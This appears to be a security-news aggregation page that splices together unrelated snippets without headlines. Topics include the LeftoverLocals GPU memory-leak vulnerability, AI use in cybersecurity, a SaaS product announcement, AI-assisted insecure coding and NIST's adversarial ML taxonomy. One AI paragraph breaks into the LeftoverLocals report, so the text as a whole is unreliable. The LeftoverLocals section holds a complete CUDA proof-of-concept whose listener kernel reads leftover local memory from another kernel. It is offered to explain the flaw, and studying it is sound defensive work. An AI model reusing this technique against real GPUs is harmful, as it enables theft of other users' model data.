Security News
Researchers at cybersecurity research and consulting firm Trail of Bits have discovered a vulnerability that could allow attackers to read GPU local memory on affected Apple, Qualcomm, AMD, and Imagination GPUs. In particular, the vulnerability, which the researchers named LeftoverLocals, can be exploited to access conversations conducted with large language models and machine learning models running on affected GPUs.
Besides helping security teams perform these tasks more accurately, AI also helps them work faster. Speed is also what cybercriminals gain by harnessing AI: it allows them to quickly adapt their attacks to new security measures.
Research made public on Tuesday detailed how miscreants can exploit the hole to read data they're not supposed to access in a system's local GPU memory. While the flaw potentially affects all GPU applications on vulnerable chips, it is especially concerning for machine-learning workloads because of the amount of data these models process on GPUs, and therefore the amount of potentially sensitive information that could be swiped by exploiting this issue.
A new vulnerability dubbed 'LeftoverLocals', affecting graphics processing units from AMD, Apple, Qualcomm, and Imagination Technologies, allows attackers to retrieve data left behind in the GPU's local memory space. [...]
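Conceptually, the attack follows a writer/listener pattern: a victim "writer" kernel leaves intermediate data behind in GPU local memory, and a co-resident attacker "listener" kernel later reads that same region without initializing it. The sketch below illustrates the idea in CUDA for readability only; NVIDIA GPUs are not among the listed affected vendors, and the researchers' actual proofs of concept use GPU APIs such as OpenCL, Vulkan, and Metal. The kernel names, canary value, and buffer size are illustrative assumptions, and whether any leftover data is actually observed depends on the hardware and scheduler.

```
#include <cstdio>
#include <cuda_runtime.h>

#define CANARY 0x41414141u   // stand-in for sensitive victim data
#define WORDS  1024          // 4 KiB of local (shared) memory per block

// "Writer" kernel: the victim workload fills local memory with data
// (here, a recognizable canary) and exits without clearing it.
__global__ void writer() {
    __shared__ unsigned int scratch[WORDS];
    for (int i = threadIdx.x; i < WORDS; i += blockDim.x)
        scratch[i] = CANARY;
    __syncthreads();         // local memory is never zeroed before exit
}

// "Listener" kernel: the attacker declares the same-sized local array,
// reads it WITHOUT initializing it, and copies whatever was left over
// into global memory for inspection.
__global__ void listener(unsigned int *out) {
    __shared__ unsigned int scratch[WORDS];
    for (int i = threadIdx.x; i < WORDS; i += blockDim.x)
        out[i] = scratch[i]; // uninitialized read of local memory
}

int main() {
    unsigned int *d_out, h_out[WORDS];
    cudaMalloc(&d_out, sizeof(h_out));

    writer<<<1, 256>>>();          // victim runs first
    listener<<<1, 256>>>(d_out);   // attacker runs afterwards
    cudaMemcpy(h_out, d_out, sizeof(h_out), cudaMemcpyDeviceToHost);

    // Count how many canary words survived into the attacker's view.
    int leaked = 0;
    for (int i = 0; i < WORDS; ++i)
        if (h_out[i] == CANARY) ++leaked;
    printf("canary words recovered: %d / %d\n", leaked, WORDS);

    cudaFree(d_out);
    return 0;
}
```

On a vulnerable GPU, the count of recovered canary words would be nonzero because local memory is not cleared between kernels from different contexts; the fix is for drivers or hardware to zero that memory before handing it to a new workload.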
Wing Security announced today that it now offers free discovery and a paid tier for automated control over thousands of AI and AI-powered SaaS applications. This will allow companies to better...
"At least, that's true today, with today's programmers using today's AI assistants." "Overall, we find that participants who had access to an AI assistant based on OpenAI's codex-davinci-002 model wrote significantly less secure code than those without access."
According to a survey, 33 percent of organizations are currently leveraging generative AI in at least one business function. Cybersecurity is also a key area where AI is being used, with 51 percent of business owners planning to enhance their cybersecurity efforts using this technology.
The failure of LLMs to live up to their hype will be the story of 2024, as generic models become relegated to consumer-centric applications and enterprise users turn to smaller, more targeted AI models, purpose-built to meet their business needs. Recognizing the value of the data they hold, companies will seek to secure it by taking a "Hybrid cloud by design" approach, rather than "Hybrid cloud by default." Ultimately, data protection will emerge as a key pillar in a successful AI strategy, and companies will move towards prioritizing AI solutions that are trustworthy and responsible.
The publication, "Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations," is a key component of NIST's broader initiative to foster the creation of reliable AI. This effort aims to facilitate the implementation of NIST's AI Risk Management Framework and aims to assist AI developers and users in understanding potential attacks and strategies to counter them, acknowledging that there is no silver bullet. "The risks of AI are as significant as the potential benefits. The latest publication from NIST is a great start to explore and categorize attacks against AI systems. It defines a formal taxonomy and provides a good set of attack classes. It does miss a few areas, such as misuse of the tools to cause harm, abuse of inherited trust by people believing AI is an authority, and the ability to de-identify people and derive sensitive data through aggregated analysis," Matthew Rosenquist, CISO at Eclipz.io commented.